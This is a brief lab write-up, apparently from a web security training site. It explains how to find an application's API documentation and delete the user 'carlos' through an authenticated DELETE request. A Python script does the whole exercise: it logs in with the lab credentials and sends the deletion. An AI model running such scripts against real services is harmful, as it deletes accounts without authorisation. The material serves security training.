Exploiting an API endpoint using documentation

1. Exploiting an API endpoint using documentation

We’re asked to delete the user “carlos” using the API exposed by this web application. We find the documentation for the API via /api and see that we can delete a user by sending a DELETE request to /api/user/username. We must be authenticated in order to make requests to the API.

We login as the user “wiener”, and send a DELETE request to /api/user/carlos, deleting carlos.

Solution:

# usage:
# python3 1.py \
# --u https://0aaa00a7037819be80f76c960063008a.web-security-academy.net
 
import http.client
import re
from argparse import ArgumentParser
 
import requests
 
http.client.HTTPConnection.debuglevel = 1
 
 
class Solution:
    def __init__(self, url: str) -> None:
        self.url = url.rstrip("/")
        self.s = None
 
    def login(self, username: str, password: str) -> requests.Response:
        self.s = requests.Session()
        login_url = f"{self.url}/login"
        r = self.s.get(login_url)
        csrf = re.findall(r"\"csrf\" value=\"([\w]+)\"", r.text)[0]
        r = self.s.post(
            login_url,
            data={
                "csrf": csrf,
                "username": username,
                "password": password,
            },
        )
 
        return r
 
    def solve(self) -> None:
        self.login("wiener", "peter")
        self.s.delete(f"{self.url}/api/user/carlos")
 
 
def main():
    parser = ArgumentParser()
    parser.add_argument("--u", "--url", dest="url")
    args = parser.parse_args()
    s = Solution(args.url)
    s.solve()
 
 
if __name__ == "__main__":
    main()